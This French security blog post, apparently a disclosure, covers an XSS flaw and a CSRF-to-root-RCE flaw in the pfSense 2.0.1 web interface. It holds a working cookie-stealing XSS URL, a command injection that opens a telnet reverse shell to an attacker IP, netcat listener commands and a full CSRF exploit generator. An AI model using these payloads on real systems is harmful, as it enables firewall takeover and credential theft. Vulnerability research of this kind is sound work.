pfSense est une distribution routeur\/firewall bas\u00e9e sur FreeBSD jug\u00e9e d’une grande fiabilit\u00e9. Issu d’un projet r\u00e9alis\u00e9 en 2004 du nom de “m0n0wall<\/a>“, qui a \u00e9t\u00e9 \u00e9galement analys\u00e9 ici<\/a>, la version 1.0 a vu le jour le 4 octobre 2006 et la derni\u00e8re release 2.0.1 date de d\u00e9cembre 2011.<\/p>\n Suite \u00e0 son d\u00e9ploiement r\u00e9cent dans un environnement virtuel en guise de test, il a \u00e9t\u00e9 possible d’exploiter ses fonctionnalit\u00e9s et toute sa puissance qui justifient amplement ses multiples \u00e9loges de part le web.<\/p>\n Administrable via SSH ou part le biais d’une interface web (WebGUI), son fonctionnement interne et a pu \u00eatre analys\u00e9 plus en profondeur.<\/p>\n Il s’av\u00e8re que dans la derni\u00e8re version, la 2.0.1 qui peut \u00eatre t\u00e9l\u00e9charg\u00e9e sur le site officiel<\/a>, quelques vuln\u00e9rabilit\u00e9s sont exploitables qui peuvent engendrer la corruption de cette distribution orient\u00e9e s\u00e9curit\u00e9.<\/p>\n Dans un premier temps, une vuln\u00e9rabilit\u00e9 de type XSS non-persistante par variable GET a pu \u00eatre exploit\u00e9e, ainsi qu’une CSRF permettant l’obtention d’un shell sous le compte root \u00e0 distance (RCE pour Remote Command Execution<\/em>).<\/p>\n Les attaques de type Cross-Site Request Forgery (abr\u00e9g\u00e9es CSRF prononc\u00e9es sea-surfing ou parfois XSRF) utilisent l’utilisateur comme d\u00e9clencheur, celui-ci devient complice sans en \u00eatre conscient. L’attaque \u00e9tant actionn\u00e9e par l’utilisateur, un grand nombre de syst\u00e8mes d’authentification sont contourn\u00e9s.<\/p>\n<\/blockquote>\n Cette analyse s’est principalement focalis\u00e9e sur l’administration WebGUI enti\u00e8rement \u00e9crite en PHP. Cette application web se scinde en de nombreux fichiers et dispose d’un m\u00e9canisme de protection anti-CSRF nomm\u00e9 “CSRF Magic<\/a>” fonctionnant par le biais de jeton (token<\/em>) qui transite avec les diverses requ\u00eates XHR.<\/p>\n Le code du WebGUI dispose de nombreuses XSS particuli\u00e8rement visibles qui ne s’av\u00e8rent toutefois pas exploitables via l’inclusion des scripts de protection CSRF. A titre d’exemple :<\/p>\n Fichier \/usr\/local\/www\/progress.php<\/strong>, ligne 21 \u00e0 30, vuln\u00e9rabilit\u00e9 potentielle \u00e0 la ligne 25 :<\/p>\n [php]&lt;br \/&gt; Un “echo” basique d’un bout de code HTML avec la variable GET “UPLOAD_IDENTIFIER” est r\u00e9alis\u00e9 sans \u00eatre nettoy\u00e9 (sanitize<\/em>). Toutefois, ce fichier utilise la fonction “upload_progress_meter_get_info()” qui n’est pas d\u00e9finie lors d’un appel direct retournant l’erreur suivante avant m\u00eame l’ex\u00e9cution de l’XSS :<\/p>\n Fatal error: Call to undefined function upload_progress_meter_get_info() in \/usr\/local\/www\/progress.php on line 21<\/p>\n<\/blockquote>\n Fichier \/usr\/local\/www\/system_gateways_edit.php<\/strong>, ligne 252 \u00e0 256, vuln\u00e9rabilit\u00e9 potentielle \u00e0 la ligne 253 :<\/p>\n [php]&lt;br \/&gt; Idem, un “echo” d’une variable POST non-nettoy\u00e9e est r\u00e9alis\u00e9. Toutefois ce fichier inclu le script de protection CSRFMagic et est donc difficilement exploitable.<\/p>\n A de multiples autres endroits de telles variables GET ou POST sont arbitrairement modifiables par un utilisateur en vue de forger des comportement sp\u00e9cifique dans le WebGUI. Il serait d’int\u00e9r\u00eat de prot\u00e9ger ces variables en les nettoyant via des “htmlentities()<\/a>” ou “htmlspecialchars()<\/a>” bien que le syst\u00e8me de protection anti-CSRF soit pr\u00e9sent.<\/p>\n Une XSS via variable GET non-persistante est toutefois pr\u00e9sente et fonctionnelle dans le fichier \/usr\/local\/www\/pkg_mgr_install.php<\/strong> \u00e0 la ligne 166 :<\/p>\n [php]&lt;br \/&gt; La variable GET “pkg” n’est pas nettoy\u00e9e avant d’\u00eatre transmise \u00e0 une fonction qui g\u00e9n\u00e8re un code JavaScript. Cette XSS est exploitable via l’URL suivante :<\/p>\n [code]http:\/\/pfsense_url\/pkg_mgr_install.php?mode=installedinfo&amp;amp;pkg=x%22;alert(document.cookie);this.document.forms[0].output.value+=%22[\/code]<\/p>\n XSS dans le WebGUI de pfSense 2.0.1<\/p><\/div>\n L’ex\u00e9cution de code PHP arbitraire (dont l’obtention d’un shell) pourrait \u00e9galement \u00eatre r\u00e9alis\u00e9 au travers du fichier \/usr\/local\/www\/exec.php<\/strong> \u00e0 la ligne 244 :<\/p>\n [php]&lt;br \/&gt; La fonction “eval” de PHP ex\u00e9cute le code transmis au travers de la variable POST “txtPHPCommand”, mais le script anti-CSRF bloque \u00e9galement l’injection de tels codes. Il est toutefois souhait\u00e9 de renforcer cette instruction.<\/p>\n Le syst\u00e8me de protection anti-CSRF est donc relativement efficace, mais les instructions non-prot\u00e9g\u00e9es devraient toutefois l’\u00eatre. Les scripts du WebGUI ne sont pas tous prot\u00e9g\u00e9s par CSRFMagic, et c’est justement ce qui permet l’obtention par une personne arbitraire d’un shell root sur la distribution pfSense.<\/p>\n Le fichier \/usr\/local\/www\/system_firware.php<\/strong>\u00a0n\u2019inclut\u00a0pas la protection CSRF (en amont du fichier, la variable “$nocsrf” est d\u00e9finie \u00e0 “True”). Ainsi, la ligne 118 pr\u00e9sente une vuln\u00e9rabilit\u00e9 exploitable :<\/p>\n [php]&lt;br \/&gt; L’appel de la fonction “system()” de PHP permet d’ex\u00e9cuter ce qui est pass\u00e9 en param\u00e8tre au travers d’un shell. Le param\u00e8tre inclu une variable POST “kerneltype” qui n’est pas nettoy\u00e9e via la fonction “escapeshellarg()<\/a>“. Ainsi, cette variable peut d\u00e9tourner la commande \u00e0 ex\u00e9cuter.<\/p>\n Par d\u00e9faut, la cha\u00eene de caract\u00e8re “SMP” est pass\u00e9e au travers de cette variable, pour finalement \u00eatre \u00e9crite dans le fichier pfsense_kernel.txt. L’id\u00e9e est de modifier cette variable pour l’otention d’un reverse-shell sur la distribution pfSense.<\/p>\n L\u00e9gitimement, la commande ex\u00e9cut\u00e9e via la fonction “system()” est semblable \u00e0 celle-ci :<\/p>\n [bash]&lt;br \/&gt; Si l’on d\u00e9finie la variable POST “kerneltype” avec la valeur suivante :<\/p>\n [php]&lt;br \/&gt; Alors, l’attaquant peut r\u00e9cup\u00e9rer un shell sur la machine simplement. Lancement des netcat sur la machine de l’attaquant :<\/p>\n [bash]&lt;br \/&gt; Les netcat en \u00e9coutes<\/p><\/div>\n Suite au placement en \u00e9coute de ces deux netcat, l’attaquant doit forger la page qui va servir \u00e0 la CSRF \u00e0 envoyer \u00e0 l’administrateur l\u00e9gitime. Pour r\u00e9aliser cela, voici un mini-g\u00e9n\u00e9rateur de CSRF destin\u00e9e \u00e0 cet exploit :<\/p>\n [html]&lt;br \/&gt; En ouvrant cette page dans votre navigateur, il est possible de forger la CSRF en fonction de vos r\u00e9glages. Le g\u00e9n\u00e9rateur de CSRF pour pfSense 2.0.1<\/p><\/div>\n Ces champs renseign\u00e9s, le code de la CSRF est automatiquement g\u00e9n\u00e9r\u00e9, dans l’exemple :<\/p>\n [html]&lt;br \/&gt; Il ne reste plus qu’\u00e0 placer ce code sur une page web quelconque (dans une iframe cach\u00e9e pour plus d’invisibilit\u00e9) et de forcer l’administrateur l\u00e9gitime \u00e0 s’y rendre pour exploiter sa session sur pfSense et obtenir le shell.<\/p>\n D\u00e8s que le code de la CSRF s’est ex\u00e9cut\u00e9 sur la machine de l’administrateur, la vuln\u00e9rabilit\u00e9 est exploit\u00e9e et le shell est obtenu :<\/p>\n Reverse-shell en action au travers de la CSRF<\/p><\/div>\n Comme il est d\u00e9crit, l’obtention du reverse-shell se fait par le biais de deux netcats c\u00f4t\u00e9 attaquant, et deux sessions telnet c\u00f4t\u00e9 pfSense. Bas\u00e9e sur FreeBSD, pfSense dispose de nombreux outils et binaires internes qui permettraient de centraliser ce reverse-shell dans un unique terminal. En effet, netcat est disponible nativement sur pfSense, ainsi que mkfifo et mknod. Toutefois apr\u00e8s maintes syntaxes m\u00ealant netcat (avec ou sans son argument -e \/bin\/sh), mkfifo et\/ou mknod, le reverse-shell ne pouvait s’\u00e9tablir… Des erreurs de “fifo null” et de politique IPSec bloquaient l’\u00e9tablissement du shell contrairement \u00e0 la m\u00e9thode via les deux telnet.<\/p>\n Le contr\u00f4le complet du firewall\/router pfSense est ainsi accessible par une personne tierce. De nombreux fichiers sont d’int\u00e9r\u00eats au sein de cette distribution. C’est le cas du fichier \/config\/config.xml<\/strong> qui contient toute la configuration du firewall\/router, ainsi que le hash du mot de passe des comptes utilisateurs (SSH et WebGUI).<\/p>\n Les deux vuln\u00e9rabilit\u00e9s d\u00e9crites au sein de cet article, \u00e0 savoir l’XSS non-persistante et la CSRF RCE, sont exploitables d\u00e8s lors qu’un compte utilisateur \u00e0 acc\u00e8s aux deux pages cibl\u00e9es “pkg_mgr_install.php<\/strong>” et “system_firmware.php<\/strong>“. Le WebGUI permet de g\u00e9rer finement des comptes utilisateurs ainsi que leurs droits d’acc\u00e8s \u00e0 telle ou telle page. Si un simple utilisateur dispose uniquement des droits d’acc\u00e8s \u00e0 ces pages, alors les\u00a0vuln\u00e9rabilit\u00e9s\u00a0sont exploitables :<\/p>\n Compte utilisateur restreint exploitable<\/p><\/div>\n Pour finaliser cet article, pfSense est une solution de grande qualit\u00e9 au niveau des param\u00e9trages disponibles et des m\u00e9canismes optimis\u00e9s qu’elle met en pratique pour prot\u00e9ger un r\u00e9seau. Toutefois certaines petites faiblesses subsistent permettant de corrompre un tel syst\u00e8me.<\/p>\n Les membres du projet pfSense ont \u00e9t\u00e9 avertis vis-\u00e0-vis des quelques remarques faites au sein de cet article et une nouvelle release<\/a> a vu le jour le 21 d\u00e9cembre 2012, disponible ici<\/a>.<\/p>\n Edit du 07\/01\/2013 :<\/strong><\/p>\n <\/p>","protected":false},"excerpt":{"rendered":" Une vuln\u00e9rabilit\u00e9 de type XSS non-persistante et une CSRF RCE permettant l’obtention d’un shell root ont \u00e9t\u00e9 d\u00e9couverte sur pfSense. […]<\/p>\n","protected":false},"author":1337,"featured_media":1164,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[59,195,517,165,516,14,515],"tags":[200,206,205,197,208,196,203,17,49,201,204,198,199,34,207],"class_list":["post-326","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-administration-reseaux-et-systemes","category-bsd","category-csrf","category-os","category-rce","category-vuln-exploit-poc","category-xss","tag-cross-site-request-forgery","tag-cross-site-scripting","tag-csrfmagic","tag-firewall","tag-netcat","tag-pare-feu","tag-pfsense","tag-php","tag-poc","tag-remote-command-execution","tag-root","tag-router","tag-routeur","tag-shell","tag-telnet"],"_links":{"self":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/326","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/users\/1337"}],"replies":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/comments?post=326"}],"version-history":[{"count":22,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/326\/revisions"}],"predecessor-version":[{"id":1652,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/posts\/326\/revisions\/1652"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media\/1164"}],"wp:attachment":[{"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/media?parent=326"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/categories?post=326"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.asafety.fr\/en\/wp-json\/wp\/v2\/tags?post=326"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}\n
\n$X = upload_progress_meter_get_info( $_GET[&amp;quot;UPLOAD_IDENTIFIER&amp;quot;] );&lt;br \/&gt;
\nif (!$X) {&lt;\/p&gt;
\n&lt;p&gt;if ( array_key_exists( &amp;quot;e&amp;quot;, $_GET ) ) {&lt;br \/&gt;
\n echo &amp;quot;&amp;lt;HTML&amp;gt;&amp;lt;BODY onLoad=’window.close();’&amp;gt;&amp;quot; . gettext(&amp;quot;Invalid Meter ID&amp;quot;) . &amp;quot;! {$_GET[&amp;quot;UPLOAD_IDENTIFIER&amp;quot;]}&amp;quot;;&lt;br \/&gt;
\n echo (‘&amp;lt;\/BODY&amp;gt;&amp;lt;\/HTML&amp;gt;’);&lt;br \/&gt;
\n }else{&lt;br \/&gt;
\n echo (‘&amp;lt;HTML&amp;gt;&amp;lt;meta HTTP-EQUIV=&amp;quot;Refresh&amp;quot; CONTENT=&amp;quot;1; url=’. $url .’&amp;quot;&amp;gt;&amp;lt;BODY&amp;gt;&amp;lt;\/BODY&amp;gt;&amp;lt;\/HTML&amp;gt;’);&lt;br \/&gt;
\n }&lt;br \/&gt;
\n exit;&lt;br \/&gt;
\n[\/php]<\/p>\n\n
\nif($_REQUEST[‘isAjax’]) {&lt;br \/&gt;
\n echo $_POST[‘name’];&lt;br \/&gt;
\n exit;&lt;br \/&gt;
\n} else if (!empty($reloadif))&lt;br \/&gt;
\n send_event(&amp;quot;interface reconfigure {$reloadif}&amp;quot;);&lt;br \/&gt;
\n[\/php]<\/p>\n
\nupdate_output_window(sprintf(gettext(&amp;quot;Could not find %s.&amp;quot;), $_GET[‘pkg’]));&lt;br \/&gt;
\n[\/php]<\/p>\n![\"XSS](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/pfsense_img1-300x110.png\" "\\"XSS")
<\/a>
\nif (!isBlank($_POST[‘txtPHPCommand’])) {&lt;br \/&gt;
\n puts(&amp;quot;&amp;lt;pre&amp;gt;&amp;quot;);&lt;br \/&gt;
\n require_once(&amp;quot;config.inc&amp;quot;);&lt;br \/&gt;
\n require_once(&amp;quot;functions.inc&amp;quot;);&lt;br \/&gt;
\n echo eval($_POST[‘txtPHPCommand’]);&lt;br \/&gt;
\n puts(&amp;quot;&amp;lt;\/pre&amp;gt;&amp;quot;);&lt;br \/&gt;
\n}&lt;br \/&gt;
\n[\/php]<\/p>\n
\nif($_POST[‘kerneltype’]) {&lt;br \/&gt;
\n if($_POST[‘kerneltype’] == &amp;quot;single&amp;quot;)&lt;br \/&gt;
\n system(&amp;quot;touch \/boot\/kernel\/pfsense_kernel.txt&amp;quot;);&lt;br \/&gt;
\n else&lt;br \/&gt;
\n system(&amp;quot;echo {$_POST[‘kerneltype’]} &amp;gt; \/boot\/kernel\/pfsense_kernel.txt&amp;quot;);&lt;br \/&gt;
\n}&lt;br \/&gt;
\n[\/php]<\/p>\n
\necho SMP &amp;gt; \/boot\/kernel\/pfsense_kernel.txt&lt;br \/&gt;
\n[\/bash]<\/p>\n
\nSMP &amp;gt; \/boot\/kernel\/pfsense_kernel.txt;telnet ATTACKER_IP 1337 | \/bin\/sh | telnet ATTACKER_IP 1338&lt;br \/&gt;
\n[\/php]<\/p>\n
\nIl faut pour cela que l’attaquant place deux terminaux avec Netcat en \u00e9coute sur deux ports distincts sur sa propre machine. Le premier terminal servira \u00e0 l’envoie des commandes \u00e0 pfSense (via le port 1337), et le second terminal s’occupera de r\u00e9cup\u00e9rer les r\u00e9sultats des commandes pass\u00e9es (via le port 1338).<\/p>\n
\nnc -l -vv -p 1337&lt;br \/&gt;
\nnc -l -vv -p 1338&lt;br \/&gt;
\n[\/bash]<\/p>\n![\"Les](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/pfsense_img2-300x75.png\" "\\"Les")
<\/a>
\n&amp;lt;html&amp;gt;&lt;br \/&gt;
\n &amp;lt;head&amp;gt;&lt;br \/&gt;
\n&amp;lt;script&amp;gt;&lt;br \/&gt;
\nfunction trim(s){&lt;br \/&gt;
\nreturn s.replace(\/\\r\\n|\\r|\\n|\\t\/g,”).replace(\/^\\s+\/g,”).replace(\/\\s+$\/g,”);&lt;br \/&gt;
\n}&lt;\/p&gt;
\n&lt;p&gt;function generateCSRF(){&lt;br \/&gt;
\nvar target = trim(document.getElementById(&amp;quot;target&amp;quot;).value);&lt;br \/&gt;
\nvar attacker = trim(document.getElementById(&amp;quot;attacker&amp;quot;).value);&lt;br \/&gt;
\nvar sendport = trim(document.getElementById(&amp;quot;sendport&amp;quot;).value);&lt;br \/&gt;
\n var readport = trim(document.getElementById(&amp;quot;readport&amp;quot;).value);&lt;br \/&gt;
\nvar resultjs = &amp;quot;&amp;quot;;&lt;br \/&gt;
\nresultjs += &amp;quot;&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;&amp;lt;form name=’x’ action=’&amp;quot; + target + &amp;quot;system_firmware.php’ method=’post’&amp;gt;&amp;quot;;&lt;br \/&gt;
\nresultjs += &amp;quot;&amp;lt;input type=’hidden’ name=’kerneltype’ value=’SMP &amp;gt; \/boot\/kernel\/pfsense_kernel.txt;telnet &amp;quot; + attacker + &amp;quot; &amp;quot; + sendport + &amp;quot; | \/bin\/sh | telnet &amp;quot; + attacker + &amp;quot; &amp;quot; + readport + &amp;quot;’ \/&amp;gt;&amp;quot;;&lt;br \/&gt;
\nresultjs += &amp;quot;&amp;lt;\/form&amp;gt;&amp;lt;script&amp;gt;document.forms[‘x’].submit();&amp;lt;\\\/script&amp;gt;&amp;lt;\/body&amp;gt;&amp;lt;\/html&amp;gt;&amp;quot;;&lt;br \/&gt;
\ndocument.getElementById(&amp;quot;resultjs&amp;quot;).value = resultjs;&lt;br \/&gt;
\n}&lt;\/p&gt;
\n&lt;p&gt;&amp;lt;\/script&amp;gt;&lt;br \/&gt;
\n&amp;lt;\/head&amp;gt;&lt;br \/&gt;
\n &amp;lt;body onload=&amp;quot;generateCSRF();&amp;quot;&amp;gt;&lt;br \/&gt;
\n &amp;lt;h2&amp;gt;CSRF pfSense 2.0.1 to root RCE (reverse shell)&amp;lt;\/h2&amp;gt;&lt;br \/&gt;
\n &amp;lt;p&amp;gt;pfSense 2.0.1, the latest firewall\/router distribution based on FreeBSD is vulnerable to a CSRF attack that allows gaining root access through a reverse shell.&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n The attacker must know the URL address of pfsense WebGui.&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n To obtain the reverseshell, attacker must place two netcat in listening mode on two different ports. One will be used to send commands and the other for receiving results.&amp;lt;br \/&amp;gt;&lt;br \/&gt;
\n On attacker machine :&lt;br \/&gt;
\n &amp;lt;pre&amp;gt;nc -l -vv -p 1337 # First netcat listener, to enter shell command.&amp;lt;\/pre&amp;gt;&lt;br \/&gt;
\n &amp;lt;pre&amp;gt;nc -l -vv -p 1338 # Second netcat listener, to receive commands results.&amp;lt;\/pre&amp;gt;&lt;br \/&gt;
\n (admin hash is in the \/config\/config.xml file on pfSense)&lt;br \/&gt;
\n &amp;lt;\/p&amp;gt;&lt;br \/&gt;
\n &amp;lt;form action=&amp;quot;&amp;quot; onsubmit=&amp;quot;generateCSRF();return false;&amp;quot;&amp;gt;&lt;br \/&gt;
\n &amp;lt;table&amp;gt;&lt;br \/&gt;
\n &amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;URL’s pfSense 2.0.1 Targeted :&amp;lt;\/td&amp;gt;\u00a0&amp;lt;td&amp;gt;&lt;br \/&gt;
\n &amp;lt;input id=&amp;quot;target&amp;quot; type=&amp;quot;text&amp;quot; value=&amp;quot;http:\/\/192.168.0.254:80\/&amp;quot; size=&amp;quot;70&amp;quot; onkeyup=&amp;quot;generateCSRF();&amp;quot; \/&amp;gt;&amp;lt;\/td&amp;gt;&lt;br \/&gt;
\n &amp;lt;\/tr&amp;gt;&lt;br \/&gt;
\n &amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Attacker IP (reverse shell) :&amp;lt;\/td&amp;gt;\u00a0&amp;lt;td&amp;gt;&lt;br \/&gt;
\n &amp;lt;input id=&amp;quot;attacker&amp;quot; type=&amp;quot;text&amp;quot; value=&amp;quot;192.168.0.141&amp;quot; size=&amp;quot;70&amp;quot; onkeyup=&amp;quot;generateCSRF();&amp;quot; \/&amp;gt;&amp;lt;\/td&amp;gt;&lt;br \/&gt;
\n &amp;lt;\/tr&amp;gt;&lt;br \/&gt;
\n &amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Attacker binded port to send commands :&amp;lt;\/td&amp;gt;\u00a0&amp;lt;td&amp;gt;&lt;br \/&gt;
\n &amp;lt;input id=&amp;quot;sendport&amp;quot; type=&amp;quot;text&amp;quot; value=&amp;quot;1337&amp;quot; size=&amp;quot;70&amp;quot; onkeyup=&amp;quot;generateCSRF();&amp;quot; \/&amp;gt;&amp;lt;\/td&amp;gt;&lt;br \/&gt;
\n &amp;lt;\/tr&amp;gt;&lt;br \/&gt;
\n &amp;lt;tr&amp;gt;&amp;lt;td&amp;gt;Attacker binded port to read results :&amp;lt;\/td&amp;gt;\u00a0&amp;lt;td&amp;gt;&lt;br \/&gt;
\n &amp;lt;input id=&amp;quot;readport&amp;quot; type=&amp;quot;text&amp;quot; value=&amp;quot;1338&amp;quot; size=&amp;quot;70&amp;quot; onkeyup=&amp;quot;generateCSRF();&amp;quot; \/&amp;gt;&amp;lt;\/td&amp;gt;&lt;br \/&gt;
\n &amp;lt;\/tr&amp;gt;&lt;\/p&gt;
\n&lt;p&gt;&amp;lt;tr&amp;gt;\u00a0&amp;lt;td&amp;gt;CSRF exploit to send to an admin : &amp;lt;\/td&amp;gt;\u00a0&amp;lt;td&amp;gt;&lt;br \/&gt;
\n&amp;lt;textarea cols=&amp;quot;70&amp;quot; rows=&amp;quot;10&amp;quot; id=&amp;quot;resultjs&amp;quot; readonly=&amp;quot;readonly&amp;quot;&amp;gt;&amp;lt;\/textarea&amp;gt;\u00a0&amp;lt;\/td&amp;gt;&lt;br \/&gt;
\n &amp;lt;\/tr&amp;gt;&lt;br \/&gt;
\n &amp;lt;\/table&amp;gt;&lt;br \/&gt;
\n &amp;lt;\/form&amp;gt;&lt;br \/&gt;
\n &amp;lt;\/body&amp;gt;&lt;br \/&gt;
\n&amp;lt;\/html&amp;gt;&lt;br \/&gt;
\n[\/html]<\/p>\n
\nIndiquer l’IP de l’attaquant (pour le reverse-shell), le port du premier netcat et le port du second ; sans oublier l’URL du pfSense cible :<\/p>\n![\"Le](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/pfsense_img3-300x192.png\" "\\"Le")
<\/a>
\n&amp;lt;html&amp;gt;&amp;lt;body&amp;gt;&amp;lt;form name=’x’ action=’http:\/\/192.168.0.254:80\/system_firmware.php’ method=’post’&amp;gt;&amp;lt;input type=’hidden’ name=’kerneltype’ value=’SMP &amp;gt; \/boot\/kernel\/pfsense_kernel.txt;telnet 192.168.0.141 1337 | \/bin\/sh | telnet 192.168.0.141 1338′ \/&amp;gt;&amp;lt;\/form&amp;gt;&amp;lt;script&amp;gt;document.forms[‘x’].submit();&amp;lt;\/script&amp;gt;&amp;lt;\/body&amp;gt;&amp;lt;\/html&amp;gt;&lt;br \/&gt;
\n[\/html]<\/p>\n![\"Reverse-shell](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/pfsense_img4-300x184.png\" "\\"Reverse-shell")
<\/a>\n
![\"Compte](\"https:\/\/www.asafety.fr\/wp-content\/uploads\/pfsense_img5-274x300.png\" "\\"Compte")
<\/a>\n